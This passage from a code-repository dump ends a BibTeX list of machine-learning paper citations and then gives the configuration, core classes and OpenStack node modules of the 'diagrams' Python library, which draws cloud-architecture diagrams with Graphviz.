title={Zero-Shot Text-to-Image Generation}, author={Aditya Ramesh and Mikhail Pavlov and Gabriel Goh and Scott Gray and Chelsea Voss and Alec Radford and Mark Chen and Ilya Sutskever}, year={2021}, eprint={2102.12092}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={Learning Transferable Visual Models From Natural Language Supervision}, author={Alec Radford and Jong Wook Kim and Chris Hallacy and Aditya Ramesh and Gabriel Goh and Sandhini Agarwal and Girish Sastry and Amanda Askell and Pamela Mishkin and Jack Clark and Gretchen Krueger and Ilya Sutskever}, year={2021}, eprint={2103.00020}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={Taming Transformers for High-Resolution Image Synthesis}, author={Patrick Esser and Robin Rombach and Björn Ommer}, year={2021}, eprint={2012.09841}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` ```text @misc{ title={BART: Denoising Sequence-to-Sequence Pre-training for Natural Language Generation, Translation, and Comprehension}, author={Mike Lewis and Yinhan Liu and Naman Goyal and Marjan Ghazvininejad and Abdelrahman Mohamed and Omer Levy and Ves Stoyanov and Luke Zettlemoyer}, year={2019}, eprint={1910.13461}, archivePrefix={arXiv}, primaryClass={cs.CL} } ``` ```text @misc{ title={Scalable Second Order Optimization for Deep Learning}, author={Rohan Anil and Vineet Gupta and Tomer Koren and Kevin Regan and Yoram Singer}, year={2021}, eprint={2002.09018}, archivePrefix={arXiv}, primaryClass={cs.LG} } ``` ```text @misc{ title={GLU Variants Improve Transformer}, author={Noam Shazeer}, year={2020}, url={https://arxiv.org/abs/2002.05202} } ``` ```text @misc{ title={DeepNet: Scaling transformers to 1,000 layers}, author={Wang, Hongyu and Ma, Shuming and Dong, Li and Huang, Shaohan and Zhang, Dongdong and Wei, Furu}, year={2022}, eprint={2203.00555} archivePrefix={arXiv}, primaryClass={cs.LG} } ``` ```text @misc{ title={NormFormer: Improved Transformer Pretraining with Extra Normalization}, author={Sam Shleifer and Jason Weston and Myle Ott}, year={2021}, eprint={2110.09456}, archivePrefix={arXiv}, primaryClass={cs.CL} } ``` ```text @inproceedings{ title={Swin Transformer V2: Scaling Up Capacity and Resolution}, author={Ze Liu and Han Hu and Yutong Lin and Zhuliang Yao and Zhenda Xie and Yixuan Wei and Jia Ning and Yue Cao and Zheng Zhang and Li Dong and Furu Wei and Baining Guo}, booktitle={International Conference on Computer Vision and Pattern Recognition (CVPR)}, year={2022} } ``` ```text @misc{ title = {CogView: Mastering Text-to-Image Generation via Transformers}, author = {Ming Ding and Zhuoyi Yang and Wenyi Hong and Wendi Zheng and Chang Zhou and Da Yin and Junyang Lin and Xu Zou and Zhou Shao and Hongxia Yang and Jie Tang}, year = {2021}, eprint = {2105.13290}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```text @misc{ title = {Root Mean Square Layer Normalization}, author = {Biao Zhang and Rico Sennrich}, year = {2019}, eprint = {1910.07467}, archivePrefix = {arXiv}, primaryClass = {cs.LG} } ``` ```text @misc{ title = {Sinkformers: Transformers with Doubly Stochastic Attention}, url = {https://arxiv.org/abs/2110.11773}, author = {Sander, Michael E. and Ablin, Pierre and Blondel, Mathieu and Peyré, Gabriel}, publisher = {arXiv}, year = {2021}, } ``` ```text @misc{ title = {Smooth activations and reproducibility in deep networks}, url = {https://arxiv.org/abs/2010.09931}, author = {Shamir, Gil I. and Lin, Dong and Coviello, Lorenzo}, publisher = {arXiv}, year = {2020}, } ``` ```text @misc{ title = {Foundation Transformers}, url = {https://arxiv.org/abs/2210.06423}, author = {Wang, Hongyu and Ma, Shuming and Huang, Shaohan and Dong, Li and Wang, Wenhui and Peng, Zhiliang and Wu, Yu and Bajaj, Payal and Singhal, Saksham and Benhaim, Alon and Patra, Barun and Liu, Zhun and Chaudhary, Vishrav and Song, Xia and Wei, Furu}, publisher = {arXiv}, year = {2022}, } ```
diagrams
4c2d8a3795d2a15a168224b2a5919c2950df679b
File: config.py # fmt: off ######################### # Application # ######################### APP_NAME = "diagrams" DIR_DOC_ROOT = "docs/nodes" DIR_APP_ROOT = "diagrams" DIR_RESOURCE = "resources" DIR_TEMPLATE = "templates" PROVIDERS = ( "base", "onprem", "aws", "azure", "digitalocean", "gcp", "ibm", "firebase", "k8s", "alibabacloud", "oci", "programming", "saas", "elastic", "generic", "openstack", "outscale", ) ######################### # Resource Processing # ######################### CMD_ROUND = "round" CMD_ROUND_OPTS = ("-w",) CMD_SVG2PNG = "inkscape" CMD_SVG2PNG_OPTS = ("-w", "256", "-h", "256", "--export-type", "png") CMD_SVG2PNG_IM = "convert" CMD_SVG2PNG_IM_OPTS = ("-shave", "25%x25%", "-resize", "256x256!") FILE_PREFIXES = { "onprem": (), "aws": ("Amazon-", "AWS-"), "azure": ("Azure-",), "digitalocean": (), "gcp": ("Cloud-",), "firebase": ("Cloud-",), "ibm": (), "k8s": (), "alibabacloud": (), "oci": ("OCI-icon-",), "programming": (), "saas": (), "elastic": (), "outscale": (), "generic": (), "openstack": (), } ######################### # Doc Auto Generation # ######################### TMPL_APIDOC = "apidoc.tmpl" ######################### # Class Auto Generation # ######################### TMPL_MODULE = "module.tmpl" UPPER_WORDS = { "aws": ("aws", "api", "ebs", "ec2", "efs", "emr", "rds", "ml", "mq", "nat", "vpc", "waf", "sdk"), "azure": ("ad", "b2c", "ai", "api", "cdn", "ddos", "dns", "fxt", "hana", "hd", "id", "sap", "sql", "vm", "vpn", "vpc"), "gcp": ("gcp", "ai", "api", "cdn", "dns", "gke", "gpu", "iap", "ml", "nat", "os", "sdk", "sql", "tpu", "vpn"), "firebase": ("ab", "fcm", "ml"), "k8s": ( "api", "cm", "ccm", "crb", "crd", "ds", "etcd", "hpa", "k8s", "ns", "psp", "pv", "pvc", "rb", "rs", "sa", "sc", "sts", "svc", ), "oci": ("oci", "ocid", "oke", "ocir", "ddos", "waf", "bm", "vm", "cdn", "vpn", "dns", "nat", "dms", "api", "id"), "elastic": ("apm", "siem", "ece", "eck", "sql"), "generic": ("vpn", "ios", "xen", "sql", "lxc"), "outscale": ("osc",), "openstack": ("rpm", "loci", "nfv", "ec2api"), "pve": ("pve"), "ibm": ("ibm"), } TITLE_WORDS = { "onprem": { "onprem": "OnPrem", }, "alibabacloud": { "alibabacloud": "AlibabaCloud" }, "aws": { "cloudfront": "CloudFront" }, "digitalocean": { "digitalocean": "DigitalOcean" }, "openstack": { "openstack": "OpenStack" }, "ibm": { "ibm": "IBMCloud" }, } # TODO: check if the classname exists ALIASES = { "onprem": { "analytics": { "Powerbi": "PowerBI" }, "ci": { "Circleci": "CircleCI", "Concourseci": "ConcourseCI", "Droneci": "DroneCI", "Gitlabci": "GitlabCI", "Travisci": "TravisCI", "Teamcity": "TC", "Zuulci": "ZuulCI", }, "container": { "Lxc": "LXC", "Rkt": "RKT", }, "database": { "Clickhouse": "ClickHouse", "Cockroachdb": "CockroachDB", "Couchdb": "CouchDB", "Hbase": "HBase", "Influxdb": "InfluxDB", "Janusgraph": "JanusGraph", "Mariadb": "MariaDB", "Mongodb": "MongoDB", "Mssql": "MSSQL", "Mysql": "MySQL", "Postgresql": "PostgreSQL", }, "gitops": { "Argocd": "ArgoCD", }, "logging": { "Fluentbit": "FluentBit", "Rsyslog": "RSyslog", }, "network": { "Etcd": "ETCD", "Haproxy": "HAProxy", "OpenServiceMesh": "OSM", "Opnsense": "OPNSense", "Pfsense": "PFSense", "Vyos": "VyOS" }, "proxmox": { "Pve": "ProxmoxVE", }, "queue": { "Activemq": "ActiveMQ", "Emqx": "EMQX", "Rabbitmq": "RabbitMQ", "Zeromq": "ZeroMQ", }, "storage": { "Ceph": "CEPH", "CephOsd": "CEPH_OSD", }, "workflow": { "Kubeflow": "KubeFlow", "Nifi": "NiFi", } }, "aws": { "analytics": { "ElasticsearchService": "ES", }, "business": { "AlexaForBusiness": "A4B" }, "blockchain": { "QuantumLedgerDatabaseQldb": "QLDB" }, "compute": { "ApplicationAutoScaling": "AutoScaling", "EC2Ami": "AMI", "EC2ContainerRegistry": "ECR", "ElasticBeanstalk": "EB", "ElasticContainerService": "ECS", "ElasticKubernetesService": "EKS", "ServerlessApplicationRepository": "SAR", }, "database": { "DatabaseMigrationService": "DMS", "DocumentdbMongodbCompatibility": "DocumentDB", "DynamodbDax": "DAX", "DynamodbGlobalSecondaryIndex": "DynamodbGSI", "Database": "DB", "Dynamodb": "DDB", "Elasticache": "ElastiCache", "QuantumLedgerDatabaseQldb": "QLDB", }, "devtools": { "CommandLineInterface": "CLI", "DeveloperTools": "DevTools", }, "engagement": { "SimpleEmailServiceSes": "SES", }, "general": { "GenericOfficeBuilding": "OfficeBuilding", }, "integration": { "SimpleNotificationServiceSns": "SNS", "SimpleQueueServiceSqs": "SQS", "StepFunctions": "SF", }, "iot": { "Freertos": "FreeRTOS", "IotHardwareBoard": "IotBoard", }, "management": { "SystemsManager": "SSM", "SystemsManagerParameterStore": "ParameterStore", }, "migration": { "ApplicationDiscoveryService": "ADS", "CloudendureMigration": "CEM", "DatabaseMigrationService": "DMS", "MigrationAndTransfer": "MAT", "ServerMigrationService": "SMS", }, "ml": { "DeepLearningContainers": "DLC", }, "network": { "CloudFront": "CF", "ElasticLoadBalancing": "ELB", "ElbApplicationLoadBalancer": "ALB", "ElbClassicLoadBalancer": "CLB", "ElbNetworkLoadBalancer": "NLB", "GlobalAccelerator": "GAX", }, "security": { "CertificateManager": "ACM", "Cloudhsm": "CloudHSM", "DirectoryService": "DS", "FirewallManager": "FMS", "IdentityAndAccessManagementIamAccessAnalyzer": "IAMAccessAnalyzer", "IdentityAndAccessManagementIamAWSSts": "IAMAWSSts", "IdentityAndAccessManagementIamPermissions": "IAMPermissions", "IdentityAndAccessManagementIamRole": "IAMRole", "IdentityAndAccessManagementIam": "IAM", "KeyManagementService": "KMS", "ResourceAccessManager": "RAM", }, "storage": { "CloudendureDisasterRecovery": "CDR", "ElasticBlockStoreEBS": "EBS", "ElasticFileSystemEFS": "EFS", "Fsx": "FSx", "SimpleStorageServiceS3": "S3", }, }, "azure": { "compute": { "ContainerRegistries": "ACR", "KubernetesServices": "AKS", "VMScaleSet": "VMSS" }, }, "gcp": { "analytics": { "Bigquery": "BigQuery", "Pubsub": "PubSub", }, "compute": { "AppEngine": "GAE", "Functions": "GCF", "ComputeEngine": "GCE", "KubernetesEngine": "GKE", }, "database": { "Bigtable": "BigTable", }, "devtools": { "ContainerRegistry": "GCR", }, "ml": { "Automl": "AutoML", "NaturalLanguageAPI": "NLAPI", "SpeechToText": "STT", "TextToSpeech": "TTS", }, "network": { "VirtualPrivateCloud": "VPC" }, "security": { "KeyManagementService": "KMS", "SecurityCommandCenter": "SCC", }, "storage": { "Storage": "GCS", }, }, "firebase": { "grow": { "Messaging": "FCM" } }, "k8s": { "clusterconfig": { "Limits": "LimitRange", "HPA": "HorizontalPodAutoscaler", }, "compute": { "Deploy": "Deployment", "DS": "DaemonSet", "RS": "ReplicaSet", "STS": "StatefulSet" }, "controlplane": { "API": "APIServer", "CM": "ControllerManager", "KProxy": "KubeProxy", "Sched": "Scheduler", }, "group": { "NS": "Namespace", }, "network": { "Ep": "Endpoint", "Ing": "Ingress", "Netpol": "NetworkPolicy", "SVC": "Service", }, "podconfig": { "CM": "ConfigMap", }, "rbac": { "CRole": "ClusterRole", "CRB": "ClusterRoleBinding", "RB": "RoleBinding", "SA": "ServiceAccount", }, "storage": { "PV": "PersistentVolume", "PVC": "PersistentVolumeClaim", "SC": "StorageClass", "Vol": "Volume", }, }, "alibabacloud": { "application": { "LogService": "SLS", "MessageNotificationService": "MNS", "PerformanceTestingService": "PTS", "SmartConversationAnalysis": "SCA", }, "compute": { "AutoScaling": "ESS", "ElasticComputeService": "ECS", "ElasticContainerInstance": "ECI", "ElasticHighPerformanceComputing": "EHPC", "FunctionCompute": "FC", "OperationOrchestrationService": "OOS", "ResourceOrchestrationService": "ROS", "ServerLoadBalancer": "SLB", "ServerlessAppEngine": "SAE", "SimpleApplicationServer": "SAS", "WebAppService": "WAS", }, "database": { "DataManagementService": "DMS", "DataTransmissionService": "DTS", "DatabaseBackupService": "DBS", "DisributeRelationalDatabaseService": "DRDS", "GraphDatabaseService": "GDS", "RelationalDatabaseService": "RDS", }, "network": { "CloudEnterpriseNetwork": "CEN", "ElasticIpAddress": "EIP", "ServerLoadBalancer": "SLB", "VirtualPrivateCloud": "VPC", }, "security": { "AntiBotService": "ABS", "AntifraudService": "AS", "CloudFirewall": "CFW", "ContentModeration": "CM", "DataEncryptionService": "DES", "WebApplicationFirewall": "WAF", }, "storage": { "FileStorageHdfs": "HDFS", "FileStorageNas": "NAS", "HybridBackupRecovery": "HBR", "HybridCloudDisasterRecovery": "HDR", "ObjectStorageService": "OSS", "ObjectTableStore": "OTS", } }, "digitalocean": {}, "oci": { "compute": { "VM": "VirtualMachine", "VMWhite": "VirtualMachineWhite", "BM": "BareMetal", "BMWhite": "BareMetalWhite", "OCIR": "OCIRegistry", "OCIRWhite": "OCIRegistryWhite", "OKE": "ContainerEngine", "OKEWhite": "ContainerEngineWhite", }, "database": { "Autonomous": "ADB", "AutonomousWhite": "ADBWhite", "DatabaseService": "DBService", "DatabaseServiceWhite": "DBServiceWhite", } }, "programming": { "framework": { "Fastapi": "FastAPI", "Graphql": "GraphQL" }, "language": { "Javascript": "JavaScript", "Nodejs": "NodeJS", "Php": "PHP", "Typescript": "TypeScript" }, }, "saas": { "logging": { "Datadog": "DataDog", "Newrelic": "NewRelic" } }, "elastic": { "elasticsearch": { "Elasticsearch": "ElasticSearch", "Logstash": "LogStash", "MachineLearning": "ML", } }, "outscale": { "Osc": "OSC", }, "ibm": {}, "generic": {}, "openstack": { "user": { "Openstackclient": "OpenStackClient", }, "billing": { "Cloudkitty": "CloudKitty", }, "deployment": { "Kolla": "KollaAnsible", "Tripleo": "TripleO", } }, } File: diagrams/__init__.py import contextvars import os import uuid from pathlib import Path from typing import Dict, List, Optional, Union from graphviz import Digraph # Global contexts for a diagrams and a cluster. # # These global contexts are for letting the clusters and nodes know # where context they are belong to. So the all clusters and nodes does # not need to specify the current diagrams or cluster via parameters. __diagram = contextvars.ContextVar("diagrams") __cluster = contextvars.ContextVar("cluster") def getdiagram() -> "Diagram": try: return __diagram.get() except LookupError: return None def setdiagram(diagram: "Diagram"): __diagram.set(diagram) def getcluster() -> "Cluster": try: return __cluster.get() except LookupError: return None def setcluster(cluster: "Cluster"): __cluster.set(cluster) class Diagram: __directions = ("TB", "BT", "LR", "RL") __curvestyles = ("ortho", "curved") __outformats = ("png", "jpg", "svg", "pdf", "dot") # fmt: off _default_graph_attrs = { "pad": "2.0", "splines": "ortho", "nodesep": "0.60", "ranksep": "0.75", "fontname": "Sans-Serif", "fontsize": "15", "fontcolor": "#2D3436", } _default_node_attrs = { "shape": "box", "style": "rounded", "fixedsize": "true", "width": "1.4", "height": "1.4", "labelloc": "b", # imagepos attribute is not backward compatible # TODO: check graphviz version to see if "imagepos" is available >= 2.40 # https://github.com/xflr6/graphviz/blob/master/graphviz/backend.py#L248 # "imagepos": "tc", "imagescale": "true", "fontname": "Sans-Serif", "fontsize": "13", "fontcolor": "#2D3436", } _default_edge_attrs = { "color": "#7B8894", } # fmt: on # TODO: Label position option # TODO: Save directory option (filename + directory?) def __init__( self, name: str = "", filename: str = "", direction: str = "LR", curvestyle: str = "ortho", outformat: str = "png", autolabel: bool = False, show: bool = True, strict: bool = False, graph_attr: Optional[dict] = None, node_attr: Optional[dict] = None, edge_attr: Optional[dict] = None, ): """Diagram represents a global diagrams context. :param name: Diagram name. It will be used for output filename if the filename isn't given. :param filename: The output filename, without the extension (.png). If not given, it will be generated from the name. :param direction: Data flow direction. Default is 'left to right'. :param curvestyle: Curve bending style. One of "ortho" or "curved". :param outformat: Output file format. Default is 'png'. :param show: Open generated image after save if true, just only save otherwise. :param graph_attr: Provide graph_attr dot config attributes. :param node_attr: Provide node_attr dot config attributes. :param edge_attr: Provide edge_attr dot config attributes. :param strict: Rendering should merge multi-edges. """ if graph_attr is None: graph_attr = {} if node_attr is None: node_attr = {} if edge_attr is None: edge_attr = {} self.name = name if not name and not filename: filename = "diagrams_image" elif not filename: filename = "_".join(self.name.split()).lower() self.filename = filename self.dot = Digraph(self.name, filename=self.filename, strict=strict) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.name for k, v in self._default_node_attrs.items(): self.dot.node_attr[k] = v for k, v in self._default_edge_attrs.items(): self.dot.edge_attr[k] = v if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction if not self._validate_curvestyle(curvestyle): raise ValueError(f'"{curvestyle}" is not a valid curvestyle') self.dot.graph_attr["splines"] = curvestyle if isinstance(outformat, list): for one_format in outformat: if not self._validate_outformat(one_format): raise ValueError(f'"{one_format}" is not a valid output format') else: if not self._validate_outformat(outformat): raise ValueError(f'"{outformat}" is not a valid output format') self.outformat = outformat # Merge passed in attributes self.dot.graph_attr.update(graph_attr) self.dot.node_attr.update(node_attr) self.dot.edge_attr.update(edge_attr) self.show = show self.autolabel = autolabel def __str__(self) -> str: return str(self.dot) def __enter__(self): setdiagram(self) return self def __exit__(self, exc_type, exc_value, traceback): self.render() # Remove the graphviz file leaving only the image. os.remove(self.filename) setdiagram(None) def _repr_png_(self): return self.dot.pipe(format="png") def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def _validate_curvestyle(self, curvestyle: str) -> bool: return curvestyle.lower() in self.__curvestyles def _validate_outformat(self, outformat: str) -> bool: return outformat.lower() in self.__outformats def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node.""" self.dot.node(nodeid, label=label, **attrs) def connect(self, node: "Node", node2: "Node", edge: "Edge") -> None: """Connect the two Nodes.""" self.dot.edge(node.nodeid, node2.nodeid, **edge.attrs) def subgraph(self, dot: Digraph) -> None: """Create a subgraph for clustering""" self.dot.subgraph(dot) def render(self) -> None: if isinstance(self.outformat, list): for one_format in self.outformat: self.dot.render(format=one_format, view=self.show, quiet=True) else: self.dot.render(format=self.outformat, view=self.show, quiet=True) class Cluster: __directions = ("TB", "BT", "LR", "RL") __bgcolors = ("#E5F5FD", "#EBF3E7", "#ECE8F6", "#FDF7E3") # fmt: off _default_graph_attrs = { "shape": "box", "style": "rounded", "labeljust": "l", "pencolor": "#AEB6BE", "fontname": "Sans-Serif", "fontsize": "12", } # fmt: on # FIXME: # Cluster direction does not work now. Graphviz couldn't render # correctly for a subgraph that has a different rank direction. def __init__( self, label: str = "cluster", direction: str = "LR", graph_attr: Optional[dict] = None, ): """Cluster represents a cluster context. :param label: Cluster label. :param direction: Data flow direction. Default is 'left to right'. :param graph_attr: Provide graph_attr dot config attributes. """ if graph_attr is None: graph_attr = {} self.label = label self.name = "cluster_" + self.label self.dot = Digraph(self.name) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.label if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") self._parent = getcluster() # Set cluster depth for distinguishing the background color self.depth = self._parent.depth + 1 if self._parent else 0 coloridx = self.depth % len(self.__bgcolors) self.dot.graph_attr["bgcolor"] = self.__bgcolors[coloridx] # Merge passed in attributes self.dot.graph_attr.update(graph_attr) def __enter__(self): setcluster(self) return self def __exit__(self, exc_type, exc_value, traceback): if self._parent: self._parent.subgraph(self.dot) else: self._diagram.subgraph(self.dot) setcluster(self._parent) def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node in the cluster.""" self.dot.node(nodeid, label=label, **attrs) def subgraph(self, dot: Digraph) -> None: self.dot.subgraph(dot) class Node: """Node represents a node for a specific backend service.""" _provider = None _type = None _icon_dir = None _icon = None _height = 1.9 def __init__(self, label: str = "", *, nodeid: str = None, **attrs: Dict): """Node represents a system component. :param label: Node label. """ # Generates an ID for identifying a node, unless specified self._id = nodeid or self._rand_id() self.label = label # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") if self._diagram.autolabel: prefix = self.__class__.__name__ if self.label: self.label = prefix + "\n" + self.label else: self.label = prefix # fmt: off # If a node has an icon, increase the height slightly to avoid # that label being spanned between icon image and white space. # Increase the height by the number of new lines included in the label. padding = 0.4 * (self.label.count('\n')) self._attrs = { "shape": "none", "height": str(self._height + padding), "image": self._load_icon(), } if self._icon else {} # fmt: on self._attrs.update(attrs) self._cluster = getcluster() # If a node is in the cluster context, add it to cluster. if self._cluster: self._cluster.node(self._id, self.label, **self._attrs) else: self._diagram.node(self._id, self.label, **self._attrs) def __repr__(self): _name = self.__class__.__name__ return f"<{self._provider}.{self._type}.{_name}>" def __sub__(self, other: Union["Node", List["Node"], "Edge"]): """Implement Self - Node, Self - [Nodes] and Self - Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self)) return other elif isinstance(other, Node): return self.connect(other, Edge(self)) else: other.node = self return other def __rsub__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] - Self because list don't have __sub__ operators.""" for o in other: if isinstance(o, Edge): o.connect(self) else: o.connect(self, Edge(self)) return self def __rshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self >> Node, Self >> [Nodes] and Self Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, forward=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, forward=True)) else: other.forward = True other.node = self return other def __lshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self << Node, Self << [Nodes] and Self << Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, reverse=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, reverse=True)) else: other.reverse = True return other.connect(self) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] >> Self because list don't have __rshift__ operators.""" for o in other: if isinstance(o, Edge): o.forward = True o.connect(self) else: o.connect(self, Edge(self, forward=True)) return self def __rlshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] << Self because list of Nodes don't have __lshift__ operators.""" for o in other: if isinstance(o, Edge): o.reverse = True o.connect(self) else: o.connect(self, Edge(self, reverse=True)) return self @property def nodeid(self): return self._id # TODO: option for adding flow description to the connection edge def connect(self, node: "Node", edge: "Edge"): """Connect to other node. :param node: Other node instance. :param edge: Type of the edge. :return: Connected node. """ if not isinstance(node, Node): ValueError(f"{node} is not a valid Node") if not isinstance(edge, Edge): ValueError(f"{edge} is not a valid Edge") # An edge must be added on the global diagrams, not a cluster. self._diagram.connect(self, node, edge) return node @staticmethod def _rand_id(): return uuid.uuid4().hex def _load_icon(self): basedir = Path(os.path.abspath(os.path.dirname(__file__))) return os.path.join(basedir.parent, self._icon_dir, self._icon) class Edge: """Edge represents an edge between two nodes.""" _default_edge_attrs = { "fontcolor": "#2D3436", "fontname": "Sans-Serif", "fontsize": "13", } def __init__( self, node: "Node" = None, forward: bool = False, reverse: bool = False, label: str = "", color: str = "", style: str = "", **attrs: Dict, ): """Edge represents an edge between two nodes. :param node: Parent node. :param forward: Points forward. :param reverse: Points backward. :param label: Edge label. :param color: Edge color. :param style: Edge style. :param attrs: Other edge attributes """ if node is not None: assert isinstance(node, Node) self.node = node self.forward = forward self.reverse = reverse self._attrs = {} # Set attributes. for k, v in self._default_edge_attrs.items(): self._attrs[k] = v if label: # Graphviz complaining about using label for edges, so replace it with xlabel. # Update: xlabel option causes the misaligned label position: https://github.com/mingrammer/diagrams/issues/83 self._attrs["label"] = label if color: self._attrs["color"] = color if style: self._attrs["style"] = style self._attrs.update(attrs) def __sub__(self, other: Union["Node", "Edge", List["Node"]]): """Implement Self - Node or Edge and Self - [Nodes]""" return self.connect(other) def __rsub__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] - Self because list don't have __sub__ operators.""" return self.append(other) def __rshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self >> Node or Edge and Self >> [Nodes].""" self.forward = True return self.connect(other) def __lshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self << Node or Edge and Self << [Nodes].""" self.reverse = True return self.connect(other) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] >> Self because list of Edges don't have __rshift__ operators.""" return self.append(other, forward=True) def __rlshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] << Self because list of Edges don't have __lshift__ operators.""" return self.append(other, reverse=True) def append(self, other: Union[List["Node"], List["Edge"]], forward=None, reverse=None) -> List["Edge"]: result = [] for o in other: if isinstance(o, Edge): o.forward = forward if forward else o.forward o.reverse = forward if forward else o.reverse self._attrs = o.attrs.copy() result.append(o) else: result.append(Edge(o, forward=forward, reverse=reverse, **self._attrs)) return result def connect(self, other: Union["Node", "Edge", List["Node"]]): if isinstance(other, list): for node in other: self.node.connect(node, self) return other elif isinstance(other, Edge): self._attrs = other._attrs.copy() return self else: if self.node is not None: return self.node.connect(other, self) else: self.node = other return self @property def attrs(self) -> Dict: if self.forward and self.reverse: direction = "both" elif self.forward: direction = "forward" elif self.reverse: direction = "back" else: direction = "none" return {**self._attrs, "dir": direction} Group = Cluster File: diagrams/openstack/containerservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Containerservices(_OpenStack): _type = "containerservices" _icon_dir = "resources/openstack/containerservices" class Kuryr(_Containerservices): _icon = "kuryr.png" # Aliases File: diagrams/openstack/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _User(_OpenStack): _type = "user" _icon_dir = "resources/openstack/user" class Openstackclient(_User): _icon = "openstackclient.png" # Aliases OpenStackClient = Openstackclient File: diagrams/openstack/billing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Billing(_OpenStack): _type = "billing" _icon_dir = "resources/openstack/billing" class Cloudkitty(_Billing): _icon = "cloudkitty.png" # Aliases CloudKitty = Cloudkitty File: diagrams/openstack/sharedservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Sharedservices(_OpenStack): _type = "sharedservices" _icon_dir = "resources/openstack/sharedservices" class Barbican(_Sharedservices): _icon = "barbican.png" class Glance(_Sharedservices): _icon = "glance.png" class Karbor(_Sharedservices): _icon = "karbor.png" class Keystone(_Sharedservices): _icon = "keystone.png" class Searchlight(_Sharedservices): _icon = "searchlight.png" # Aliases File: diagrams/openstack/deployment.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Deployment(_OpenStack): _type = "deployment" _icon_dir = "resources/openstack/deployment" class Ansible(_Deployment): _icon = "ansible.png" class Charms(_Deployment): _icon = "charms.png" class Chef(_Deployment): _icon = "chef.png" class Helm(_Deployment): _icon = "helm.png" class Kolla(_Deployment): _icon = "kolla.png" class Tripleo(_Deployment): _icon = "tripleo.png" # Aliases KollaAnsible = Kolla TripleO = Tripleo File: diagrams/openstack/workloadprovisioning.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Workloadprovisioning(_OpenStack): _type = "workloadprovisioning" _icon_dir = "resources/openstack/workloadprovisioning" class Magnum(_Workloadprovisioning): _icon = "magnum.png" class Sahara(_Workloadprovisioning): _icon = "sahara.png" class Trove(_Workloadprovisioning): _icon = "trove.png" # Aliases File: diagrams/openstack/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Monitoring(_OpenStack): _type = "monitoring" _icon_dir = "resources/openstack/monitoring" class Monasca(_Monitoring): _icon = "monasca.png" class Telemetry(_Monitoring): _icon = "telemetry.png" # Aliases File: diagrams/openstack/lifecyclemanagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Lifecyclemanagement(_OpenStack): _type = "lifecyclemanagement" _icon_dir = "resources/openstack/lifecyclemanagement" # Aliases File: diagrams/openstack/baremetal.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Baremetal(_OpenStack): _type = "baremetal" _icon_dir = "resources/openstack/baremetal" class Cyborg(_Baremetal): _icon = "cyborg.png" class Ironic(_Baremetal): _icon = "ironic.png" # Aliases File: diagrams/openstack/optimization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Optimization(_OpenStack): _type = "optimization" _icon_dir = "resources/openstack/optimization" class Congress(_Optimization): _icon = "congress.png" class Rally(_Optimization): _icon = "rally.png" class Vitrage(_Optimization): _icon = "vitrage.png" class Watcher(_Optimization): _icon = "watcher.png" # Aliases File: diagrams/openstack/frontend.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Frontend(_OpenStack): _type = "frontend" _icon_dir = "resources/openstack/frontend" class Horizon(_Frontend): _icon = "horizon.png" # Aliases File: diagrams/openstack/__init__.py """ Openstack provides a set of general OpenStack services. """ from diagrams import Node class _OpenStack(Node): _provider = "openstack" _icon_dir = "resources/openstack" fontcolor = "#ffffff" File: diagrams/openstack/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Orchestration(_OpenStack): _type = "orchestration" _icon_dir = "resources/openstack/orchestration" class Blazar(_Orchestration): _icon = "blazar.png" class Heat(_Orchestration): _icon = "heat.png" class Mistral(_Orchestration): _icon = "mistral.png" class Senlin(_Orchestration): _icon = "senlin.png" class Zaqar(_Orchestration): _icon = "zaqar.png" # Aliases File: 